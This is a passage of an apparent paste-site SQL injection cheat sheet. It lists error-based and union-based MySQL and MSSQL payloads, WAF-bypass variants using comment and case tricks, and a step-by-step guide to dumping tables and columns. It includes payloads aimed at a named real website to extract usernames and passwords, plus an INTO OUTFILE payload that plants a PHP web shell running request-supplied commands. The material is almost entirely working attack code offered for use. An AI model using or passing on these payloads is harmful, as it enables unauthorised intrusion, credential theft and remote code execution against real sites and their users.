  713. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- -
  714.  
  715. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  716.  
  717. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  718.  
  719. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
  720.  
  721. or 1=convert(int,(@@version))--   (MSSQL, not MySQL: the failed int conversion raises an error that echoes the value)
  722. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
  723. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  724.  
  725. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))--+-   -- the hex literal decodes to <b><font color=blue>ph3wl
  726. ===================================================================================================================================
  727. WAF BYPASS BY TOTTI
  728. ===================================================================================================================================
  729.  
  730. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_name)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())-- -
  731.  
  732. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  733.  
  734. ===================================================================================================================================
  735. WUBI – 1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x69)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a2020,column_name))))x),3,4--   -- the "0×" characters were mis-encoded "0x"; the original separator 0x20203a3a3a32020 had an odd digit count (MySQL pads it with a leading 0, yielding garbage bytes), 0x20203a3a3a2020 is "  :::  "
  736.  
  737. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
  738. (select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)   -- database.table and columns are placeholders; the variable must be the same one throughout (the original mixed @x:= with @)
  739.  
  740. (select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)   -- database.table and columns are placeholders; the variable must be the same one throughout (the original mixed @x:= with @)
  741. ===================================================================================================================================
  742.  
  743. +and+1=convert(int,SERVERPROPERTY('ProductVersion'))   (MSSQL error-based version disclosure)
  744. ===================================================================================================================================
  745.  
  746. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  747.  
  748. http://www.websec.ca/kb/sql_injection
  749.  
  750. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  751.  
  752. ===================================================================================================================================
  753. test
  754.  
  755. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  756.  
  757. …………………………………..
  758. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  759.  
  760. SELECT "<?php system($_REQUEST['cmd']); ?>"
  761. INTO OUTFILE "full/path/here/cmd.php"   -- needs the FILE privilege, a secure_file_priv setting that allows the path, and a directory writable by the mysqld user; use "<?php" rather than "<?" so it does not depend on short_open_tag
  762.  
  763. _____________________________________________________
  764.  
  765. for more exclusive hacking tutorials visit : http://bit.ly/1Mfv5G3
  766. ==============================
  767. SQL Injection Commands
  768. ==============================
  769. Get Columns Number
  770. ==============================
  771. +order+by+
  772. ==============================
  773. Find the reflected column (the one whose value is displayed on the page)
  774. ==============================
  775. +union+select+
  776. ==============================
  777. Get database name
  778. ==============================
  779. Database()
  780. ==============================
  781. Get database version
  782. ==============================
  783. Version()
  784. ==============================
  785. get database user
  786. User()
  787. ==============================
  788. get all tables
  789. ==============================
  790. Place this in the reflected column
  791. ==============================
  792. group_concat(table_name)
  793. ==============================
  794. Append this to the end of the URL
  795. ==============================
  796. +from+information_schema.tables+where+table_schema=database()--
  797. ==============================
  798. get all columns
  799. ==============================
  800. Place this in the reflected column
  801. ==============================
  802. group_concat(column_name)
  803. ==============================
  804. Append this to the end of the URL
  805. ==============================
  806. +from+information_schema.columns+where+table_schema=database()--
  807. ==============================
  808. Bypass WAF
  809. ==============================
  810. Union Select WAF bypass
  811. ==============================
  812. Add this filter
  813. ==============================
  814. /*! */
  815. ==============================
  816. to
  817. ==============================
  818. select
  819. ==============================
  820. to be
  821. ==============================
  822. /*!select*/
  823. ==============================
  824. If that did not work, change this
  825. ==============================
  826. select
  827. ==============================
  828. to
  829. ==============================
  830. /*!SeLeCt*/
  831. ==============================
  832. Capital and small letters
  833. ==============================
  834. Bypass WAF when getting tables
  835. ==============================
  836. Change this
  837. ==============================
  838. select
  839. ==============================
  840. to this
  841. ==============================
  842. /*!SeLeCt*/
  843. ==============================
  844. and this
  845. ==============================
  846. group_concat(table_name)
  847. ==============================
  848. to this
  849. ==============================
  850. /*!GrOuP_CoNcAT(table_name)*/
  851. ==============================
  852. and append this to the end of the URL
  853. ==============================
  854. +from+information_schema.tables+where+table_schema=database()--
  855. ==============================
  856. Bypass WAF when getting Columns
  857. ==============================
  858. change this
  859. ==============================
  860. select
  861. ==============================
  862. to this
  863. ==============================
  864. /*!SeLeCt*/
  865. ==============================
  866. change this
  867. ==============================
  868. group_concat(column_name)
  869. ==============================
  870. to this
  871. ==============================
  872. /*!GrOuP_CoNcAT(column_name)*/
  873. ==============================
  874. and append this to the end of the URL
  875. ==============================
  876. +from+information_schema.columns+where+table_schema=database()--
  877. ==============================
  878. to be like this
  879. ==============================
  880. +
  881. ==============================
  882. from+information_schema./*!columns*/+where+table_schema=database()--
  883. ==============================
  884. Additional command for waf bypass
  885. ==============================
  886. Place this in the reflected column
  887. ==============================
  888. concat(unhex(hex(concat(table_name,0x3a,column_name,0x3a,table_schema))))
  889. ==============================
  890. and append this to the end of the URL
  891. ==============================
  892. +from+information_schema.columns--
  893. ==============================
  894. Column count not showing?
  895. ==============================
  896. add this
  897. ==============================
  898. +--+
  899. ==============================
  900. to the finish of the url
  901. ==============================
  902. and add this
  903. ==============================
  904. '
  905. ==============================
  906. after
  907. ==============================
  908. .php?id=1
  909. ==============================
  910. to be like this
  911. ==============================
  912. .php?id=1'
  913. ==========================